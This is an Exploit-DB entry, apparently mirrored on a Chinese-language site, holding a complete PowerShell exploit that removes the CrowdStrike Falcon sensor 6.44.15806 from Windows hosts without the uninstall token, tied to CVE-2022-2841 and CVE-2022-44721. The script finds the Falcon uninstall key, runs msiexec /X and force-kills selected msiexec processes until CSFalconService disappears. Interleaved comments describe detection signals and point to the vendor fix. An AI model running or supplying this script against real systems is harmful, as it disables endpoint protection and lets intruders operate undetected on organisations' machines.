CrowdStrike Falcon AGENT 6.44.15806 – Uninstall without Installation Token

  • 作者: Fortunato Lodari
    日期: 2023-03-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51146/
  • # Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
    # Date: 30/11/2022 
    # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) 
    # Vendor Homepage: https://www.crowdstrike.com/ 
    # Author Homepage: https://www.deda.cloud/ 
    # Tested On: All Windows versions 
    # Version: 6.44.15806 
    # CVE: Based on CVE-2022-2841; modified by Deda Cloud Purple Team members to exploit the hotfixed release. Publication of CVE-2022-44721 in progress.
    
    
    # Defender's reading of this script: it looks up the Falcon sensor's entry under the
    # Uninstall registry key, launches msiexec /X against that key name, and then force-kills
    # selected msiexec.exe instances while CSFalconService is still running. Every step uses
    # stock Windows tooling, so detection has to key on the combination of these events on one
    # host rather than on any single command.
    $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
    
    # Select the Uninstall subkey whose DisplayName is "CrowdStrike Sensor Platform"; the
    # seventh path segment of $obj.Name is the subkey name that is later passed to msiexec /X.
    foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
    {
    $uninstall_uuid = $obj.Name.Split("\")[6]
    }
    }
    
    # Running list of msiexec PIDs observed so far; the script counts distinct instances with it.
    $g_msiexec_instances = New-Object System.Collections.ArrayList
    
    Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
    Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
    # Detection: msiexec.exe started with "/X<Falcon uninstall key>" from a PowerShell parent
    # and, per the header, without the installation token the sensor's uninstall protection
    # expects. That pairing is the first observable of this technique.
    Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"
    
    # Polling loop: runs until CSFalconService can no longer be found. While the service is
    # present, each newly seen msiexec PID is recorded, and the fourth and fifth distinct
    # instances are force-terminated about 100 ms after first being noticed.
    # Detection: Stop-Process (process termination) of msiexec.exe issued from a PowerShell
    # host while CSFalconService is running, plus tight-loop Get-Process polling by that host.
    # Mitigation: apply the vendor fix for the CVE named in the file header; the token-gated
    # uninstall is exactly the control this sequence is written to get around.
    while($true)
    {
    	if (get-process -Name "CSFalconService") {
    		Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
    			
    			if (-Not $g_msiexec_instances.contains($_.id)){
    				$g_msiexec_instances.Add($_.id)
    				if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
    					Start-Sleep -Milliseconds 100
    					Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
    					stop-process -Force -Id $g_msiexec_instances[-1]				
    				}
    
    			}
    		
    		}
    	} else { 
    		# Absence of the service is taken as success; the printed message tells the
    		# operator to reboot to complete the removal. Loss of the CSFalconService
    		# process on a host that has not been deliberately decommissioned is itself
    		# an alerting condition for the defending team.
    		Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
    		break
    	}
    }